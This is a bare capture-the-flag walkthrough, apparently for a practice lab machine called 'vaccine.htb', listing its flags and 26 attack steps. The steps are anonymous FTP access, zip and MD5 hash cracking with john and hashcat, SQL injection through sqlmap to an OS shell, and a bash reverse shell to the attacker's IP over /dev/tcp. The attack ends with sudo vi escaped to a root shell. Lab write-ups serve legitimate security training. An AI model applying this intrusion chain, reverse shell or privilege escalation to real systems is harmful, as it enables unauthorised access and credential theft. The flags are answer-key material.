Target IP: 10.129.159.17

Attacking IP: 10.10.14.239

user flag:
ec9b13ca4d6229cd5cc1e09980965bf7

root flag:
dd6e058e814260bc70e9bbdef2715849

Steps:
1. nmap -sV -p- 10.129.159.17
2. ftp 10.129.159.17 (Log in as anon)
3. get backup.zip
4. zip2john backup.zip > backup.txt
5. john backup.txt
6. john --show backup.txt
	Password: 741852963
7. unzip backup.zip 
	index.php   style.css
8. grep -i pass *
	username = admin     password(MD5) = 2cb42f8734ea607eefed3b70af13bbd3
9. hashid 2cb42f8734ea607eefed3b70af13bbd3
10. echo 2cb42f8734ea607eefed3b70af13bbd3 > hash
11. hashcat -m 0 hash /usr/share/wordlists/rockyou.txt
12. hashcat -m 0 --show hash
	2cb42f8734ea607eefed3b70af13bbd3:qwerty789
13. Login to vaccine.htb
14. Search for random string in search bar
15. Intercept with Burpsuite
16. Save the request as file
17. sqlmap -r request --os-shell
18. bash -c "sh -i >& /dev/tcp/10.10.14.239/1261 0>&1"
19. cat /var/lib/postgresql/user.txt
20. cd /var/www/html
21. grep -i pass *
	user: postgres   password: P@s5w0rd!
22. sudo -l
23. sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
24. :set shell=/bin/sh
25. :shell
26. cat /root/root.txt


